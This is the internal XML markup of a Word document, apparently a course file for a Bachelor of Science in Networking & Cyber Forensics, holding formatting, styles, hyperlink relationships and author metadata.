    <w:p w14:paraId="1C1B777F" w14:textId="77777777" w:rsidR="00FA2C0F" w:rsidRDefault="00FA2C0F" w:rsidP="007E6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BE27" w14:textId="77777777" w:rsidR="007E621D" w:rsidRDefault="007E621D">
    <w:pPr>
      <w:shd w:val="clear" w:color="auto" w:fill="4472C4"/>
      <w:spacing w:after="221"/>
      <w:ind w:left="0" w:right="179" w:firstLine="0"/>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:r>
      <w:rPr>
        <w:b/>
        <w:color w:val="FFFFFF"/>
        <w:sz w:val="32"/>
      </w:rPr>
      <w:t xml:space="preserve">Bachelor of Science in Networking &amp; Cyber Forensics </w:t>
    </w:r>
  </w:p>
  <w:p w14:paraId="67DAC471" w14:textId="77777777" w:rsidR="007E621D" w:rsidRDefault="007E621D">
    <w:pPr>
      <w:shd w:val="clear" w:color="auto" w:fill="4472C4"/>
      <w:spacing w:after="67"/>
      <w:ind w:left="0" w:right="180" w:firstLine="0"/>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:r>
      <w:rPr>
        <w:b/>
        <w:color w:val="FFFFFF"/>
        <w:sz w:val="32"/>
      </w:rPr>
      <w:t xml:space="preserve">(BSCNCSF24DA) </w:t>
    </w:r>
  </w:p>
  <w:p w14:paraId="4EAF2101" w14:textId="77777777" w:rsidR="007E621D" w:rsidRDefault="007E621D">
    <w:pPr>
      <w:spacing w:after="0"/>
      <w:ind w:left="5" w:firstLine="0"/>
      <w:jc w:val="left"/>
    </w:pPr>
    <w:r>
      <w:rPr>
        <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
      </w:rPr>
      <w:t xml:space="preserve"> </w:t>
    </w:r>
  </w:p>
  <w:p w14:paraId="2F920A2B" w14:textId="77777777" w:rsidR="007E621D" w:rsidRDefault="007E621D">
    <w:pPr>
      <w:spacing w:after="0"/>
      <w:ind w:left="5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111E" w14:textId="77777777" w:rsidR="007E621D" w:rsidRDefault="007E621D">
    <w:pPr>
      <w:shd w:val="clear" w:color="auto" w:fill="4472C4"/>
      <w:spacing w:after="221"/>
      <w:ind w:left="0" w:right="179" w:firstLine="0"/>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:r>
      <w:rPr>
        <w:b/>
        <w:color w:val="FFFFFF"/>
        <w:sz w:val="32"/>
      </w:rPr>
      <w:t xml:space="preserve">Bachelor of Science in Networking &amp; Cyber Forensics </w:t>
    </w:r>
  </w:p>
  <w:p w14:paraId="73BB8D61" w14:textId="77777777" w:rsidR="007E621D" w:rsidRDefault="007E621D">
    <w:pPr>
      <w:shd w:val="clear" w:color="auto" w:fill="4472C4"/>
      <w:spacing w:after="67"/>
      <w:ind w:left="0" w:right="180" w:firstLine="0"/>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:r>
      <w:rPr>
        <w:b/>
        <w:color w:val="FFFFFF"/>
        <w:sz w:val="32"/>
      </w:rPr>
      <w:t xml:space="preserve">(BSCNCSF24DA) </w:t>
    </w:r>
  </w:p>
  <w:p w14:paraId="7D2BA823" w14:textId="77777777" w:rsidR="007E621D" w:rsidRDefault="007E621D">
    <w:pPr>
      <w:spacing w:after="0"/>
      <w:ind w:left="5" w:firstLine="0"/>
      <w:jc w:val="left"/>
    </w:pPr>
    <w:r>
      <w:rPr>
        <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
      </w:rPr>
      <w:t xml:space="preserve"> </w:t>
    </w:r>
  </w:p>
  <w:p w14:paraId="0EDE481F" w14:textId="77777777" w:rsidR="007E621D" w:rsidRDefault="007E621D">
    <w:pPr>
      <w:spacing w:after="0"/>
      <w:ind w:left="5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05"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="CB8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22A15"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="676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8240">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="52586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1D"/>
    <w:rsid w:val="006542FD"/>
    <w:rsid w:val="007E621D"/>
    <w:rsid w:val="00FA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4D9A"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{CCE4ACEF-F602-4026-8EA0-EEB1BFC2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1D"/>
    <w:pPr>
      <w:spacing w:after="226" w:line="259" w:lineRule="auto"/>
      <w:ind w:left="15" w:hanging="10"/>
      <w:jc w:val="both"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
      <w:color w:val="00000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21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E6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621D"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
      <w:color w:val="000000"/>
      <w:lang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7E6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621D"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman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jpg"/><Relationship Id="rId50" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer2.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.indiaspam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://www.indiaspam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jpg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www.indiaspam.com" TargetMode="External"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.indiaspam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www.indiaspam.com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jp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Galimu Fred Dawson</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Galimu Fred Dawson</cp:lastModifiedBy>
  <cp:revision>1</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2026-09-22T11:16:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-09-22T11:20:00Z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5d365146-d3e2-4af8-922f-31c1669a9026</vt:lpwstr>
  </property>
</Properties>
</file>